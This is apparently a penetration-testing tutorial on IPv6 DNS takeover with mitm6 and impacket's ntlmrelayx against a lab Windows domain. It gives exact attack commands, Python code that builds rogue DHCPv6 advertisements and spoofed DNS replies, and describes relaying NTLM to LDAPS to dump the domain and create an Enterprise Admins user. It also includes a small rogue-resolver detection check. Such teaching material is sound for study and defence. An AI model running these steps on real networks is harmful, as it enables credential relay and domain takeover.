IPv6 Attack

Introduction

Windows hosts have IPv6 enabled by default and prefer it over IPv4, but most corporate networks are configured for IPv4 only: nobody on the network is serving DHCPv6 or IPv6 DNS. Windows clients still send DHCPv6 Solicit messages at boot, on network changes and on a periodic timer, so a threat actor on the same subnet can answer them and hand each client its own link-local address as the IPv6 DNS server.

Because Windows prefers the IPv6 DNS server when one is configured, name lookups from those clients now go to the threat actor, who answers queries for names inside the target domain (most usefully the WPAD proxy name) with its own address. The client then connects to the attacker's web/proxy server and, when challenged, authenticates with NTLM. The attacker relays those NTLM messages to the Domain Controller (DC), for example over LDAP(S), which works as long as the target does not enforce signing or channel binding on that service.

The attacker uses mitm6 (the DHCPv6/DNS spoofer) together with impacket's ntlmrelayx.py (the relay) to authenticate to the DC, dump domain information and, when the relayed user is privileged enough, create new accounts that can be used to attack the network.
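The DHCPv6 exchange described above, shown as an added example (this is not mitm6's code, which is built on scapy). A client broadcasts a Solicit; the rogue server answers with an Advertise (and later a Reply) carrying a lease, the attacker as DNS server and the target domain as search list. The DUIDs, transaction ID, addresses and the domain marvel.local are constructed sample values, and `rogue_dns_servers` is the check a defender would run over captured DHCPv6 traffic.

```python
"""Build and inspect the DHCPv6 messages behind an IPv6 DNS takeover (RFC 8415 framing)."""
import ipaddress
import struct

SOLICIT, ADVERTISE, REQUEST, REPLY = 1, 2, 3, 7
OPT_CLIENTID, OPT_SERVERID, OPT_IA_NA, OPT_IAADDR = 1, 2, 3, 5
OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 23, 24


def encode_name(name):
    """DNS wire encoding of a domain name, as used by the domain search list option."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_names(data):
    """Decode one or more concatenated wire-format names."""
    names, i = [], 0
    while i < len(data):
        labels = []
        while data[i]:
            labels.append(data[i + 1:i + 1 + data[i]].decode("ascii"))
            i += 1 + data[i]
        i += 1
        names.append(".".join(labels))
    return names


def option(code, payload):
    """DHCPv6 option: 2-byte code, 2-byte length, payload."""
    return struct.pack("!HH", code, len(payload)) + payload


def parse_message(pkt):
    """Return (msg-type, transaction-id, [(option-code, payload), ...])."""
    opts, i = [], 4
    while i + 4 <= len(pkt):
        code, length = struct.unpack_from("!HH", pkt, i)
        opts.append((code, pkt[i + 4:i + 4 + length]))
        i += 4 + length
    return pkt[0], int.from_bytes(pkt[1:4], "big"), opts


def build_solicit(xid, client_duid, iaid=b"\x00\x00\x00\x01"):
    """Minimal client SOLICIT: client identity plus a request for an address (IA_NA)."""
    body = option(OPT_CLIENTID, client_duid) + option(OPT_IA_NA, iaid + struct.pack("!II", 0, 0))
    return bytes([SOLICIT]) + xid.to_bytes(3, "big") + body


def build_rogue_advertise(solicit, server_duid, lease_addr, dns_server, domain):
    """The rogue server's ADVERTISE: a lease, itself as DNS server, the target domain as search list."""
    msg_type, xid, opts = parse_message(solicit)
    if msg_type != SOLICIT:
        raise ValueError("expected SOLICIT")
    client_duid = next(p for c, p in opts if c == OPT_CLIENTID)
    iaid = next(p for c, p in opts if c == OPT_IA_NA)[:4]
    # Short lifetimes (seconds) make the client renew often and keep the rogue config fresh.
    iaaddr = option(OPT_IAADDR, ipaddress.IPv6Address(lease_addr).packed + struct.pack("!II", 300, 300))
    ia_na = option(OPT_IA_NA, iaid + struct.pack("!II", 200, 250) + iaaddr)
    body = (option(OPT_CLIENTID, client_duid)
            + option(OPT_SERVERID, server_duid)
            + ia_na
            + option(OPT_DNS_SERVERS, ipaddress.IPv6Address(dns_server).packed)  # the takeover itself
            + option(OPT_DOMAIN_LIST, encode_name(domain)))
    return bytes([ADVERTISE]) + xid.to_bytes(3, "big") + body


def advertised_dns_servers(pkt):
    """DNS resolvers an ADVERTISE/REPLY pushes to the client."""
    servers = []
    for code, payload in parse_message(pkt)[2]:
        if code == OPT_DNS_SERVERS:
            servers += [str(ipaddress.IPv6Address(payload[j:j + 16])) for j in range(0, len(payload), 16)]
    return servers


def search_domains(pkt):
    return [n for c, p in parse_message(pkt)[2] if c == OPT_DOMAIN_LIST for n in decode_names(p)]


def rogue_dns_servers(pkt, allowed):
    """Detection check: any advertised resolver outside the allow-list is suspect."""
    return [s for s in advertised_dns_servers(pkt) if s not in allowed]


if __name__ == "__main__":
    # Constructed sample exchange: client DUID, attacker DUID and addresses are made up.
    sol = build_solicit(0x123456, b"\x00\x01\x00\x01\xaa\xbb")
    adv = build_rogue_advertise(sol, b"\x00\x03\x00\x01\xde\xad\xbe\xef\xca\xfe",
                                "fe80::1234", "fe80::1", "marvel.local")
    print("DNS servers pushed:", advertised_dns_servers(adv))
    print("search list:", search_domains(adv))
    print("rogue resolvers:", rogue_dns_servers(adv, {"fd00::53"}))
```

On a real network the client follows the Advertise with a Request and the rogue server answers with a Reply carrying the same options; the parsing above applies unchanged to both. A network with no legitimate DHCPv6 server can use an empty allow-list, in which case every advertised resolver is rogue.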

IPv6 DNS Takeover via MITM6

Steps

  • Start ntlmrelayx.py.

  • Start mitm6.

  • Wait for a client to (re)configure IPv6, for example a reboot, a login or the DHCPv6 renewal timer.

  • Wait for ntlmrelayx.py to finish the relay and the LDAP attack.

  • Review the dumped domain information.

Install mitm6

GitHub: https://github.com/dirkjanm/mitm6

cd /opt
git clone https://github.com/dirkjanm/mitm6.git
cd /opt/mitm6
sudo pip install .

ntlmrelayx.py

Syntax: ntlmrelayx.py -6 -t ldaps://[DC IP] -wh [WPAD hostname inside the target domain] -l [Dumps Folder]

-6 makes ntlmrelayx.py listen on IPv6 as well, -t is the relay target and -l the loot folder. The hostname given to -wh must be inside the target's Windows domain; the label in front of it can be anything (e.g. fakewpad.marvel.local). mitm6 only spoofs DNS answers for names under the domain it is started with, and Windows only sends NTLM credentials automatically to hosts it treats as part of the intranet, so a name outside the target domain would never trigger the authentication.

ntlmrelayx.py -6 -t ldaps://10.1.1.100 -wh fakewpad.marvel.local -l dumps
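The DNS-side decision behind the -wh note, as an added example that is not mitm6's own code: once a client uses the attacker as its DNS server, every lookup arrives there, and a mitm6-style responder answers only names under the domain it was started with (the -d domain) and ignores the rest. This simplified model handles AAAA queries only (mitm6 also answers A queries), fe80::1 stands in for the attacker's link-local address, and the queries are constructed packets.

```python
"""Decide which DNS queries a rogue IPv6 resolver should answer and build the spoofed reply."""
import ipaddress
import struct

QTYPE_AAAA = 28


def encode_name(name):
    """DNS wire encoding of a domain name."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(qid, name, qtype=QTYPE_AAAA):
    """Standard recursive query: 12-byte header, one question, no other sections."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_question(pkt):
    """Return (id, qname, qtype, offset just past the question) for a one-question packet."""
    qid, _flags, qdcount = struct.unpack_from("!HHH", pkt, 0)
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, i = [], 12
    while pkt[i]:
        labels.append(pkt[i + 1:i + 1 + pkt[i]].decode("ascii"))
        i += 1 + pkt[i]
    qtype, _qclass = struct.unpack_from("!HH", pkt, i + 1)
    return qid, ".".join(labels), qtype, i + 5


def in_target_domain(qname, domain):
    """True for the domain itself and any name beneath it (case-insensitive, trailing dot ignored)."""
    q, d = qname.lower().rstrip("."), domain.lower().rstrip(".")
    return q == d or q.endswith("." + d)


def spoofed_answer(query, domain, attacker_v6, ttl=100):
    """Answer AAAA queries inside `domain` with the attacker's address; return None otherwise."""
    qid, qname, qtype, qend = parse_question(query)
    if qtype != QTYPE_AAAA or not in_target_domain(qname, domain):
        return None  # not ours: a real responder lets the query go unanswered or forwards it
    header = struct.pack("!HHHHHH", qid, 0x8180, 1, 1, 0, 0)  # response, RD+RA set, NOERROR
    # The answer name is a compression pointer (0xC00C) back to the question at offset 12.
    rr = (b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_AAAA, 1, ttl, 16)
          + ipaddress.IPv6Address(attacker_v6).packed)
    return header + query[12:qend] + rr


def answered_address(response):
    """Extract the AAAA rdata from a response built by spoofed_answer (for checking)."""
    _, _, _, qend = parse_question(response)
    rdlength = struct.unpack_from("!H", response, qend + 10)[0]
    return str(ipaddress.IPv6Address(response[qend + 12:qend + 12 + rdlength]))


if __name__ == "__main__":
    for name in ("fakewpad.marvel.local", "wpad.contoso.local"):
        reply = spoofed_answer(build_query(0x1234, name), "marvel.local", "fe80::1")
        print(name, "->", answered_address(reply) if reply else "ignored")
```

Whether the spoofed answer then yields an NTLM exchange depends on the client side: the name has to be one Windows will contact and authenticate to automatically, which is why the WPAD hostname is chosen inside the target domain rather than any arbitrary name the responder could also spoof.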

mitm6

Syntax: sudo mitm6 -d [domain]

sudo mitm6 -d marvel.local

After starting ntlmrelayx.py and mitm6, wait for a client to (re)configure its IPv6 settings; this happens when a machine reboots, when a user logs in, or when the DHCPv6 lease is renewed. Once a client has picked up the rogue DNS server and authenticates to the WPAD host, both programs carry out the relay automatically and dump the information.

ntlmrelayx.py Attack

ntlmrelayx.py gathered domain information over the relayed LDAPS session and, because the relayed account was privileged enough, created a new user in the Enterprise Admins group. When the relayed user is unprivileged only the domain dump is produced, and the relay fails outright if the DC enforces LDAP signing or channel binding.

mitm6 Attack

Domain Information Dump

The following screenshots show the files that were created in the loot folder given with -l (dumps in the example above) containing the domain's information.
